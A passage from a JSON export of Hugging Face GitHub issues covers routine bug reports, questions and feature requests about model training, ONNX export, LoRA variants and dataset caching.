pre-runtime type check error on the `model.to(\"cuda:0\") call. This is the error,\n\n```plaintext\nPyright: Argument of type \"Literal['cuda:0']\" cannot be assigned to parameter \"self\" of \ntype \"LlamaForCausalLM\" in function \"__call__\".\n\"Literal['cuda:0']\" is not assignable to \"LlamaForCausalLM\" [reportArgumentType]  \n```\n\nWhat is the correct way to put a model to the device that will satisfy the type checker?\n\n### Expected behavior\n\nThere should be know static type check error when doing `model.to()`",
    "url": "https://github.com/huggingface/transformers/issues/38052",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-05-09T19:01:15Z",
    "updated_at": "2025-06-29T08:03:07Z",
    "user": "nickeisenberg"
  },
  {
    "repo": "huggingface/finetrainers",
    "number": 401,
    "title": "how to train wan using multi-node",
    "body": "### Feature request  / \u529f\u80fd\u5efa\u8bae\n\nHi! I still wonder the multi-node training of Wan2.1 14B. Do you support FSDP across nodes? \n\n### Motivation / \u52a8\u673a\n\nCurrently the memory restraint is very harsh for long video LoRA fine-tuning\n\n### Your contribution / \u60a8\u7684\u8d21\u732e\n\nN/A",
    "url": "https://github.com/huggingface/finetrainers/issues/401",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-09T18:11:07Z",
    "updated_at": "2025-05-09T18:11:07Z",
    "user": "Radioheading"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1091,
    "title": "Diffusion policy for different tasks instead of PushT",
    "body": "Thank you all for the great job. I want to know if I can train the diffusion policy for different tasks besides the PushT task. How to achieve that? If the task is a new custom task with custom dataset, is there any feasible solution to solve that? \nThank you for your help!",
    "url": "https://github.com/huggingface/lerobot/issues/1091",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "stale"
    ],
    "created_at": "2025-05-09T15:44:20Z",
    "updated_at": "2025-12-31T02:35:27Z",
    "user": "siqisiqisiqisiqi"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1086,
    "title": "push_to_the_hub error",
    "body": "### System Info\n\n```Shell\n- `lerobot` version: 0.1.0\n- Platform: macOS-14.6.1-arm64-arm-64bit\n- Python version: 3.10.13\n- Huggingface_hub version: 0.30.2\n- Dataset version: 3.5.0\n- Numpy version: 2.2.5\n- PyTorch version (GPU?): 2.7.0 (False)\n- Cuda version: N/A\n- Using GPU in script?: \n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nimport argparse\nfrom lerobot.common.datasets.lerobot_dataset import LeRobotDataset\n\ndef parse_args():\n    parser = argparse.ArgumentParser(description=\"Push a local HuggingFace dataset to the Hub\")\n    parser.add_argument(\n        \"--path\", \n        type=str, \n        required=True, \n        help=\"Local directory containing the dataset\"\n    )\n    parser.add_argument(\n        \"--repo_id\", \n        type=str, \n        required=True, \n        help=\"Repository ID on HuggingFace Hub (format: username/dataset_name)\"\n    )\n    parser.add_argument(\n        \"--private\", \n        action=\"store_true\", \n        help=\"Whether to make the dataset private\"\n    )\n    # Removed unused arguments\n    return parser.parse_args()\n\ndef main():\n    args = parse_args()\n    \n    print(f\"Loading dataset from {args.path}...\")\n    dataset = LeRobotDataset(\n        repo_id=args.repo_id,\n        root=args.path\n    )\n    \n    print(f\"Pushing dataset to {args.repo_id}...\")\n    dataset.push_to_hub(\n        args.repo_id,\n        private=args.private\n    )\n    print(\"Dataset successfully pushed to Hub!\")\n    \n    return 0\n\nif __name__ == \"__main__\":\n    main()\n\n\n\"Image\"\n\n### Expected behavior\n\nupload it to the huggingface",
    "url": "https://github.com/huggingface/lerobot/issues/1086",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-09T03:48:09Z",
    "updated_at": "2025-10-17T11:55:25Z",
    "user": "jungwonshin"
  },
  {
    "repo": "huggingface/trl",
    "number": 3424,
    "title": "[GRPO] How to train model using vLLM and model parallelism on one node?",
    "body": "I tried to start GRPO trainer with vLLM and model parallelism on a single node with 8 GPUs (8 x A100 80G).\n\nMy plan was to use one GPU as the vLLM server and other 7 GPUs to load model with model parallelism (e.g., `device_map=\"auto\"`)\n\n```\nCUDA_VISIBLE_DEVICES=0 trl vllm-serve --model  &\nCUDA_VISIBLE_DEVICES=1,2,3,4,5,6,7 accelerate launch --num_machines 1 --num_processes 1 train.py\n```\n\nBut the training ran into the following error\n\n`AssertionError: this nccl communicator is created to work on cuda:0, but the input tensor is on cuda:1`\n\nI think it happened when copying the weights to vLLM server.\n\n```\ntorch==2.6.0+cu124\ntransformers==4.51.3\ntrl==0.17.0\naccelerate==1.4.0\n```\n\n",
    "url": "https://github.com/huggingface/trl/issues/3424",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-08T17:22:19Z",
    "updated_at": "2025-12-02T22:48:13Z",
    "user": "zhiqihuang"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1082,
    "title": "When add openvla oft  policy?",
    "body": "",
    "url": "https://github.com/huggingface/lerobot/issues/1082",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "stale"
    ],
    "created_at": "2025-05-08T09:16:16Z",
    "updated_at": "2025-12-31T02:35:30Z",
    "user": "zmf2022"
  },
  {
    "repo": "huggingface/text-generation-inference",
    "number": 3213,
    "title": "Whether it supports Huawei Atlas300 graphics card?",
    "body": "### System Info\n\n\nDoes the tgi inference framework support Huawei Atlas300I graphics cards?Could you help come up with a compatible solution?\n\n\n### Information\n\n- [x] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\n.\n\n### Expected behavior\n\nCompatible with Huawei graphics cards. I want to use tgi on the Huawei Atlas300I graphics card",
    "url": "https://github.com/huggingface/text-generation-inference/issues/3213",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-08T03:18:30Z",
    "updated_at": "2025-05-08T03:18:38Z",
    "comments": 0,
    "user": "fxb392"
  },
  {
    "repo": "huggingface/trl",
    "number": 3419,
    "title": "[GRPO] How to do gradient accumulation over sampled outputs?",
    "body": "Greetings,\n\nI am wondering if we have this feature to do gradient accumulation over sampled outputs. For example, if I have `num_generations = 4`, so we have a single query `q1`, we have`completions = [o1, o2, o3, o4]`. I want to set that `per_device_train_batch_size=2, gradient_accumulation_steps=2`. So that the GPU or cluster will sample `[o1, o2]` first, and then calculate the gradient, then do, `[o3,o4]`, and do gradient accumulation over these two mini-samples for the datapoint `q1`. \n\nI assume this will be equivalent to having `num_generations=4, per_device_train_batch_size=4, gradient_accumulation_steps=1`. But we cannot do this now. Could someone tell me how to properly do that? Do we support such feature now?\n\nI hope I made myself clear.\n\nThank you very much!",
    "url": "https://github.com/huggingface/trl/issues/3419",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-07T17:49:36Z",
    "updated_at": "2025-05-09T06:26:29Z",
    "user": "SpaceHunterInf"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1080,
    "title": "Update `control_sim_robot.py` to use the new configs",
    "body": "Adding this issue to track one of the TODO's of this MR #550 \n\nAs of now, [this script](https://github.com/huggingface/lerobot/blob/8cfab3882480bdde38e42d93a9752de5ed42cae2/lerobot/scripts/control_sim_robot.py) is outdated; It does not use the new configuration classes.",
    "url": "https://github.com/huggingface/lerobot/issues/1080",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-07T11:37:47Z",
    "updated_at": "2025-06-19T14:04:11Z",
    "user": "jccalvojackson"
  },
  {
    "repo": "huggingface/Math-Verify",
    "number": 53,
    "title": "How to turn off error print?",
    "body": "When using multiprocessing, there is a lot of error message printed.",
    "url": "https://github.com/huggingface/Math-Verify/issues/53",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-07T08:19:36Z",
    "updated_at": "2025-07-02T16:07:02Z",
    "user": "wenxueru"
  },
  {
    "repo": "huggingface/peft",
    "number": 2533,
    "title": "Integrate TLoRA (Tri-Matrix LoRA)",
    "body": "### Feature request\n\nWe would like to propose integrating a novel parameter-efficient fine-tuning method called **TLoRA (Tri-Matrix LoRA)** into the `peft` library. We believe TLoRA offers significant advantages in terms of parameter efficiency, making it a valuable addition to the PEFT ecosystem.\n\nOur method is detailed in the paper: **https://arxiv.org/abs/2504.18735**\n\n**What is TLoRA?**\n\nTLoRA is a variation of LoRA that introduces a tri-matrix decomposition for the weight update matrix $\\Delta W$. Instead of the standard $W + A B$, TLoRA uses $W + \\alpha A B C $, where:\n\n* $W$ is the original pre-trained weight matrix.\n* $A$ is a fixed, non-trainable matrix (e.g., initialized randomly or using Kaiming/Xavier).\n* $B$ is the _only_ trainable matrix.\n* $C$ is another fixed, non-trainable matrix (similar initialization as A).\n* $\\alpha$ is a trainable scaling parameter.\n\nThe $\\Delta W$ update is computed as the product of three matrices: a fixed input projection matrix $A$, a small trainable bottleneck matrix $B$, and a fixed output projection matrix $C$. Only matrix $B$ is updated during fine-tuning.\n\n**TLoRA Implementation:**\n\nThe core idea can be represented in a layer similar to this (based on our implementation):\n\n```python\nclass TLoRALayer(nn.Module):\n    def __init__(self, weight, bias, rank=32):\n        super(TLoRALayer, self).__init__()\n\n        row, column = weight.shape\n\n        # Restore Linear layer\n        if bias is None:\n            self.linear = nn.Linear(column, row, bias=False)\n            self.linear.load_state_dict({\"weight\": weight})\n        else:\n            self.linear = nn.Linear(column, row)\n            self.linear.load_state_dict({\"weight\": weight, \"bias\": bias})\n\n        # Create TLoRA weights with initialization\n        self.random_A = nn.Parameter(\n            torch.zeros(column, rank), requires_grad=False\n        )  # First matrix, non-trainable\n        nn.init.kaiming_normal_(self.random_A, a=math.sqrt(5))\n\n        self.lora_B = nn.Parameter(torch.zeros(rank, rank))  # Second matrix (trainable)\n\n        self.random_C = nn.Parameter(\n            torch.zeros(rank, row), requires_grad=False\n        )  # Third matrix\n        nn.init.kaiming_normal_(self.random_C, a=math.sqrt(5))\n\n        self.lora_scaling = nn.Parameter(torch.ones(1))\n        self.dropout = nn.Dropout(0.5)\n\n    def forward(self, input):\n        # Standard linear transformation\n        x = self.linear(input)\n\n        # Low-rank adaptation with tri-matrix TLoRA\n        # Using the scaling to control the LoRA output\n        y = self.lora_scaling * (input @ self.random_A @ self.lora_B @ self.random_C)\n\n        y = self.dropout(y)\n\n        return x + y\n\n```\n\nFull Repo: https://github.com/itanvir/tlora \n\n### Motivation\n\n1.  **Extreme Parameter Efficiency:** The core trainable component in TLoRA is the matrix $B$ with dimensions `rank x rank`. Compared to standard LoRA's trainable matrices $A$ (`input_dim x rank`) and $B$ (`rank x output_dim`), TLoRA's trainable parameters are significantly fewer. This makes TLoRA potentially one of the most parameter-efficient methods in PEFT for a given rank.\n2.  **Competitive Performance:** The fixed matrices $A$ and $C$ can be seen as defining fixed subspaces. By training only the matrix $B$ connecting these subspaces, TLoRA might capture more focused and effective updates compared to training the full $A$ and $B$ matrices in standard LoRA. 
Our paper provides empirical evidence supporting its effectiveness.\n\n### Your contribution\n\nI can give input on the design. It should be straightforward.",
    "url": "https://github.com/huggingface/peft/issues/2533",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-06T21:22:50Z",
    "updated_at": "2025-06-15T15:03:57Z",
    "comments": 2,
    "user": "itanvir"
  },
  {
    "repo": "huggingface/candle",
    "number": 2945,
    "title": "Operating steps from scratch for beginners?",
    "body": "from\na\nTo\nZ",
    "url": "https://github.com/huggingface/candle/issues/2945",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-06T15:34:02Z",
    "updated_at": "2025-05-06T15:34:02Z",
    "comments": 0,
    "user": "Qarqor5555555"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1072,
    "title": "How to merge collected data into one?",
    "body": "For stability I collect data 10 episode by 10. Then forming this:\nrepo_id/first,repo_id_second...\nI want to merge them together to repo_id/one_task for training, but it's hard to fix meta files. \n\nI'm not sure if this approach helps with training, or if I should determine the number of episodes needed for training in advance when collecting data.",
    "url": "https://github.com/huggingface/lerobot/issues/1072",
    "state": "closed",
    "labels": [
      "question",
      "dataset"
    ],
    "created_at": "2025-05-06T02:27:24Z",
    "updated_at": "2025-05-07T02:29:27Z",
    "user": "milong26"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11499,
    "title": "[Performance] Issue on *SanaLinearAttnProcessor2_0 family. 1.06X speedup can be reached with a simple change.",
    "body": "### Sys env:\nOS Ubuntu 22.04\nPyTorch  2.4.0+cu121\nsana ==  0.0.1\nDiffusers == 0.34.0.dev0\n\n### Reproduce:\nTry the demo test code:\n```\nimport torch\nfrom diffusers import SanaPAGPipeline\n\npipe = SanaPAGPipeline.from_pretrained(\n  # \"Efficient-Large-Model/Sana_1600M_512px_diffusers\",  \n  \"Efficient-Large-Model/SANA1.5_1.6B_1024px_diffusers\",\n  torch_dtype=torch.bfloat16,\n  pag_applied_layers=\"transformer_blocks.8\",\n)\npipe.to(\"cuda\")\n\npipe.text_encoder.to(torch.bfloat16)\npipe.vae.to(torch.bfloat16)\n\nprompt = 'a cyberpunk cat with a neon sign that says \"Sana\"'\nimage = pipe(\n    prompt=prompt,\n    guidance_scale=5.0,\n    pag_scale=2.0,\n    num_inference_steps=20,\n    generator=torch.Generator(device=\"cuda\").manual_seed(42),\n)[0]\nimage[0].save('sana.png')\n```\n\nInference data will go through [SanaLinearAttnProcessor2_0](https://github.com/huggingface/diffusers/blob/58431f102cf39c3c8a569f32d71b2ea8caa461e1/src/diffusers/models/attention_processor.py#L6007)\n\n\n### Issue Description:\nLines 6042 and 6043 first transposed a contiguous tensor and then did type casting. Type casting invokes a data copy from an old type tensor to a new one. But if you print the new tensor's stride(), you will see:\n```\n        hidden_states = hidden_states.flatten(1, 2).transpose(1, 2)\n        hidden_states = hidden_states.to(original_dtype)\n        print(\"Contiguity after type casting: \", hidden_states.is_contiguous()) # False\n\n        hidden_states = attn.to_out[0](hidden_states)\n        hidden_states = attn.to_out[1](hidden_states)\n```\n\nThe problem is typecasting copies, only did the dtype transmission based on the input tensor's strides. And the bad-strided tensor is immediately used by the latter two functions. Inefficiency is broadcast.\n\n### How to Fix:\nlet `hidden_states.to(original_dtype)` do contiguous and typecasting simultaneously.\nOne possible approach:\n```\n@torch.compile\ndef transpose_cast_kernel(input_tensor: torch.Tensor) -> torch.Tensor:\n    \"\"\"\n    torch-compiled kernel that transposes a 2D tensor and converts it to bfloat16\n    \"\"\"\n    converted = input_tensor.to(torch.bfloat16)\n    transposed = torch.transpose(converted, 1, 2).contiguous()\n    return transposed\n```\nUse the versatile operation to handle the creation of the new tensor.\n```\n        hidden_states = hidden_states.flatten(1, 2).transpose(1, 2)\n        hidden_states = transpose_cast_kernel(hidden_states)\n        # hidden_states.is_contiguous() True\n\n        hidden_states = attn.to_out[0](hidden_states)\n        hidden_states = attn.to_out[1](hidden_states)\n```\nOr, your expert team could do even better.\n\n### Measurement:\nBy adopting the previous change, the **SanaLinearAttnProcessor2_0.__call__ enjoys** 1.06X speedup on RTX3090.\nPAGCFGSanaLinearAttnProcessor2_0, and PAGIdentitySanaLinearAttnProcessor2_0 have similar logic and lose performance as well. \n\n",
    "url": "https://github.com/huggingface/diffusers/issues/11499",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-05T21:26:51Z",
    "updated_at": "2025-08-08T23:44:59Z",
    "comments": 11,
    "user": "David-Dingle"
  },
  {
    "repo": "huggingface/candle",
    "number": 2944,
    "title": "finetuning yolo 8 candle model",
    "body": "What is the correct way to finetune yolo8 model to be used here ? Finetuning model using candle is not straightforward.\ncandle\\candle-examples\\examples\\yolo-v8\\main.rs \n// model model architecture points at ultralytics : https://github.com/ultralytics/ultralytics/issues/189\nBut my model trained using ultralytics and converted to safetensors yield tensor errors when used in candle ylo 8 example. Renaming the tensors to match the candle yolo model did not work.\n\nI see DarkNet struct in the model.rs so I wonder if one should rather use [Darknet](https://github.com/hank-ai/darknet) instead (@LaurentMazare ) ? \n",
    "url": "https://github.com/huggingface/candle/issues/2944",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-05T15:21:48Z",
    "updated_at": "2025-05-05T18:46:52Z",
    "comments": 0,
    "user": "flutter-painter"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11489,
    "title": "Error when I'm trying to train a Flux lora with train_dreambooth_lora_flux_advanced",
    "body": "### Describe the bug\n\nHi! I'm trying to train my lora model with [train_dreambooth_lora_flux_advanced](https://github.com/huggingface/diffusers/blob/main/examples/advanced_diffusion_training/train_dreambooth_lora_flux_advanced.py) script.\n\nWhen I'm trying to train my model with prior preservation tag I give an error.\n\nHow can I fix it?\n\n\n\n### Reproduction\n\n```bash\naccelerate launch train_dreambooth_lora_flux_advanced.py \\\n  --pretrained_model_name_or_path=\"black-forest-labs/FLUX.1-dev\" \\\n  --dataset_name=\"./ds5\" \\\n  --instance_prompt=\"1boy, 1girl\" \\\n  --validation_prompt=\"1boy, 1girl\" \\\n  --class_prompt=\"1boy, 1girl\" \\\n  --num_class_images=200 \\\n  --with_prior_preservation \\\n  --class_data_dir=\"./cdi\" \\\n  --output_dir=\"crtr-SDXL-LoRA\" \\\n  --caption_column=\"text\" \\\n  --mixed_precision=\"bf16\" \\\n  --prior_generation_precision=\"bf16\" \\\n  --resolution=1024 \\\n  --train_batch_size=8 \\\n  --repeats=1 \\\n  --gradient_accumulation_steps=8 \\\n  --gradient_checkpointing \\\n  --learning_rate=1.0 \\\n  --optimizer=\"prodigy\"\\\n  --lr_scheduler=\"constant\" \\\n  --lr_warmup_steps=0 \\\n  --rank=64 \\\n  --num_train_epochs=200 \\\n  --validation_epochs=100 \\\n  --center_crop \\\n  --adam_beta2=0.99 \\\n  --adam_weight_decay=0.01 \\\n  --allow_tf32\n```\n\n### Logs\n\n```shell\nTraceback (most recent call last):\n  File \"/workspace/train_dreambooth_lora_flux_advanced.py\", line 2423, in \n    main(args)\n  File \"/workspace/train_dreambooth_lora_flux_advanced.py\", line 2213, in main\n    (weighting.float() * (model_pred_prior.float() - target_prior.float()) ** 2).reshape(\n     ~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nRuntimeError: The size of tensor a (16) must match the size of tensor b (8) at non-singleton dimension 0\n```\n\n### System Info\n\nDiffusers 0.33\nCUDA 12.9\nTorch 2.7\n\nDocker image\nnvcr.io/nvidia/pytorch:25.04-py3\n\n### Who can help?\n\n@sayakpaul",
    "url": "https://github.com/huggingface/diffusers/issues/11489",
    "state": "open",
    "labels": [
      "bug",
      "training"
    ],
    "created_at": "2025-05-04T21:19:23Z",
    "updated_at": "2025-07-06T19:38:40Z",
    "comments": 4,
    "user": "Mnwa"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11488,
    "title": "Sincerely Request The Support for Flux PAG Pipeline",
    "body": "When the pag pipeline of flux can be supported?",
    "url": "https://github.com/huggingface/diffusers/issues/11488",
    "state": "open",
    "labels": [
      "help wanted",
      "Good second issue"
    ],
    "created_at": "2025-05-04T11:12:05Z",
    "updated_at": "2025-05-16T04:53:52Z",
    "comments": 2,
    "user": "PlutoQyl"
  },
  {
    "repo": "huggingface/text-generation-inference",
    "number": 3208,
    "title": "Can I use TGI in a Supercomputer?",
    "body": "I want to generate somewhere around 1 trillion tokens and I was thinking of using TGI on a European Supercomputer. is there a way to achieve this without relying on docker and downloading the model natively and then load it on the compute node and serve it? @Wauplin ",
    "url": "https://github.com/huggingface/text-generation-inference/issues/3208",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-03T15:13:24Z",
    "updated_at": "2025-05-15T08:55:08Z",
    "comments": 4,
    "user": "sleepingcat4"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1305,
    "title": "Trying to convert dinov2 model",
    "body": "### Question\n\nI tried to convert [this model](https://huggingface.co/nguyenkhoa/dinov2_Liveness_detection_v2.2.3) using the following command: \n\n`python -m scripts.convert --model_id nguyenkhoa/dinov2_Liveness_detection_v2.2.3 --quantize --task image-classification`\n\nbut got the following error:\n\n``ValueError: Trying to export a dinov2 model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type dinov2 to be supported natively in the ONNX export.``\n\nI looked a bit into the `custom_onnx_configs` flag and found [this conversion example](https://github.com/huggingface/transformers.js/issues/906#issuecomment-2315290257). My question is regarding what should I pass to `custom_onnx_configs` for the conversion to work? I could pass `gpt2` as used in the example but I'm wondering what is the correct `custom_onnx_configs` input for dinov2 models.\n\nThank you!",
    "url": "https://github.com/huggingface/transformers.js/issues/1305",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-01T19:56:28Z",
    "updated_at": "2025-05-05T22:18:48Z",
    "user": "jdp8"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7545,
    "title": "Networked Pull Through Cache",
    "body": "### Feature request\n\nIntroduce a HF_DATASET_CACHE_NETWORK_LOCATION configuration (e.g. an environment variable) together with a companion network cache service.\n\nEnable a three-tier cache lookup for datasets:\n\n1. Local on-disk cache\n2. Configurable network cache proxy\n3. Official Hugging Face Hub\n\n### Motivation\n\n- Distributed training & ephemeral jobs: In high-performance or containerized clusters, relying solely on a local disk cache either becomes a streaming bottleneck or incurs a heavy cold-start penalty as each job must re-download datasets.\n- Traffic & cost reduction: A pull-through network cache lets multiple consumers share a common cache layer, reducing duplicate downloads from the Hub and lowering egress costs.\n- Better streaming adoption: By offloading repeat dataset pulls to a locally managed cache proxy, streaming workloads can achieve higher throughput and more predictable latency.\n- Proven pattern: Similar proxy-cache solutions (e.g. Harbor\u2019s Proxy Cache for Docker images) have demonstrated reliability and performance at scale: https://goharbor.io/docs/2.1.0/administration/configure-proxy-cache/\n\n### Your contribution\n\nI\u2019m happy to draft the initial PR for adding HF_DATASET_CACHE_NETWORK_LOCATION support in datasets and sketch out a minimal cache-service prototype.\n\nI have limited bandwidth so I would be looking for collaborators if anyone else is interested. ",
    "url": "https://github.com/huggingface/datasets/issues/7545",
    "state": "open",
    "labels": [
      "enhancement"
    ],
    "created_at": "2025-04-30T15:16:33Z",
    "updated_at": "2025-04-30T15:16:33Z",
    "comments": 0,
    "user": "wrmedford"
  },
  {
    "repo": "huggingface/transformers",
    "number": 37895,
    "title": "How to backpropagate the gradients of the embeddings output by the image processor to the input image tensor?",
    "body": "### Feature request\n\nI'm using the processor of Qwen2.5-VL, and the image processor within it should be Qwen2ImageProcessor. The input image I provide is a PyTorch tensor with gradients, and the processor outputs the feature embeddings of the image. How can I ensure that the gradient flow is not interrupted during this process?\n\n### Motivation\n\nI want to backpropagate the gradients of the embeddings output by the Qwen2 image processor to the input image tensor\n\n### Your contribution\n\nI can coporate to fix this issue",
    "url": "https://github.com/huggingface/transformers/issues/37895",
    "state": "open",
    "labels": [
      "Feature request"
    ],
    "created_at": "2025-04-30T15:06:40Z",
    "updated_at": "2025-05-01T13:36:24Z",
    "user": "weiminbai"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11466,
    "title": "Finetuning of flux or scratch training",
    "body": "I am new to this field and wanted to know if Is there any code available for training the flux from scratch or even finetuning the existing model. All I see is the dreambooth or Lora finetuning.",
    "url": "https://github.com/huggingface/diffusers/issues/11466",
    "state": "open",
    "labels": [],
    "created_at": "2025-04-30T07:45:49Z",
    "updated_at": "2025-05-30T16:32:33Z",
    "comments": 2,
    "user": "preethamp0197"
  },
  {
    "repo": "huggingface/hf-hub",
    "number": 104,
    "title": "What is this software licensed under?",
    "body": "Would this also be Apache 2 like in https://github.com/huggingface/huggingface_hub/?\nThanks!",
    "url": "https://github.com/huggingface/hf-hub/issues/104",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-29T16:27:10Z",
    "updated_at": "2025-06-16T09:09:43Z",
    "user": "nathankw"
  },
  {
    "repo": "huggingface/optimum",
    "number": 2248,
    "title": "Export cli export RT-Detr",
    "body": "```python\nTraceback (most recent call last):\n  File \"/usr/local/bin/optimum-cli\", line 8, in \n    sys.exit(main())\n             ^^^^^^\n  File \"/usr/local/lib/python3.11/dist-packages/optimum/commands/optimum_cli.py\", line 208, in main\n    service.run()\n  File \"/usr/local/lib/python3.11/dist-packages/optimum/commands/export/onnx.py\", line 265, in run\n    main_export(\n  File \"/usr/local/lib/python3.11/dist-packages/optimum/exporters/onnx/__main__.py\", line 375, in main_export\n    onnx_export_from_model(\n  File \"/usr/local/lib/python3.11/dist-packages/optimum/exporters/onnx/convert.py\", line 1033, in onnx_export_from_model\n    raise ValueError(\nValueError: Trying to export a rt-detr model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type rt-detr to be supported natively in the ONNX export.\n```\n\nWhen I try to export my fine-tuned model with RT-DETR, it always pops up with the above error.\n\nEven with the cmd line `optimum-cli export onnx -m PekingU/rtdetr_r18vd --task object-detection test_onnx` still shows the same error. So, it should not be an issue related to finetuned model.\n\nI would like to know how to export a finetuned model. It would be helpful if anyone can give me some hint. Thanks!\n",
    "url": "https://github.com/huggingface/optimum/issues/2248",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-29T08:23:17Z",
    "updated_at": "2025-05-05T08:03:21Z",
    "comments": 1,
    "user": "TheMattBin"
  },
  {
    "repo": "huggingface/open-muse",
    "number": 144,
    "title": "how to set the minimum learning rate for cosine lr_scheduler?",
    "body": "@dataclass\nclass TrainingArguments(transformers.TrainingArguments):\n    gradient_checkpointing_kwargs={'use_reentrant':False}\n    lr_scheduler_kwargs={\n        \"eta_min\":1e-6,\n        \"num_cycles\":1,\n    }\n\nIt did not work. how to set the minimum learning rate in transformers-4.51.3?",
    "url": "https://github.com/huggingface/open-muse/issues/144",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-29T02:18:59Z",
    "updated_at": "2025-04-29T02:20:42Z",
    "user": "xubuvd"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1045,
    "title": "Inefficient Config Structure without Hydra",
    "body": "Hi, I notice that the repo used Hydra before, which can modify some config param or create new config yaml files. However, this was deprecated. I wonder how to efficiently modify a new config file for policy without writing these params in the command line each time?",
    "url": "https://github.com/huggingface/lerobot/issues/1045",
    "state": "closed",
    "labels": [
      "question",
      "configuration",
      "stale"
    ],
    "created_at": "2025-04-28T11:48:08Z",
    "updated_at": "2025-11-18T02:30:46Z",
    "user": "jiangranlv"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11432,
    "title": "`.from_pretrained` `torch_dtype=\"auto\"` argument not working a expected",
    "body": "### Describe the bug\n\nHey dear diffusers team,\n\nthanks a lot for all your hard work!\n\nI would like to make use of the `torch_dtype=\"auto\"` keyword argument when loading a model/pipeline as specified [here](https://huggingface.co/docs/diffusers/main/en/api/pipelines/overview#diffusers.DiffusionPipeline.from_pretrained.torch_dtype), but the usage does not work as expected (see example below). Can you help me out with some guidance on how to use it correctly or let me know whether there is something wrong with the handling of this argument?\n\nThank you!\n\n### Reproduction\n\n```python\nfrom diffusers import StableDiffusionPipeline\n\nmodel = StableDiffusionPipeline.from_pretrained(\"CompVis/stable-diffusion-v1-4\", torch_dtype=\"auto\")\n```\n\n### Logs\n\n```shell\nPassed `torch_dtype` torch.float32 is not a `torch.dtype`. Defaulting to `torch.float32`.\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.33.1\n- Platform: Linux-5.15.0-136-generic-x86_64-with-glibc2.35\n- Running on Google Colab?: No\n- Python version: 3.10.17\n- PyTorch version (GPU?): 2.7.0+cu126 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.30.2\n- Transformers version: 4.51.3\n- Accelerate version: 1.6.0\n- PEFT version: 0.15.2\n- Bitsandbytes version: 0.45.5\n- Safetensors version: 0.5.3\n- xFormers version: not installed\n- Accelerator: NVIDIA H100 PCIe, 81559 MiB\n- Using GPU in script?: Yes\n- Using distributed or parallel set-up in script?: No\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11432",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-04-28T04:31:26Z",
    "updated_at": "2025-05-13T01:42:37Z",
    "comments": 3,
    "user": "johannaSommer"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1041,
    "title": "image transform of pi0 is inconsistent with openpi",
    "body": "Thank you for pi0 work in lerobot.However, i found that image transform was quite different from openpi.\nimage transform of lerobot pi0:\n\n![Image](https://github.com/user-attachments/assets/6ff30d08-bc84-4005-8cb9-adc917f9817e)\n\nimage transform of openpi:\n\n![Image](https://github.com/user-attachments/assets/75845f92-d54e-43ea-be08-81504b6df2ff)\n\nAre there some special considerations? By the way, resize_with_pad is also different.",
    "url": "https://github.com/huggingface/lerobot/issues/1041",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "stale"
    ],
    "created_at": "2025-04-28T03:08:10Z",
    "updated_at": "2025-11-20T02:30:12Z",
    "user": "wushandinghua"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11423,
    "title": "Lora Hotswap no clear documentation",
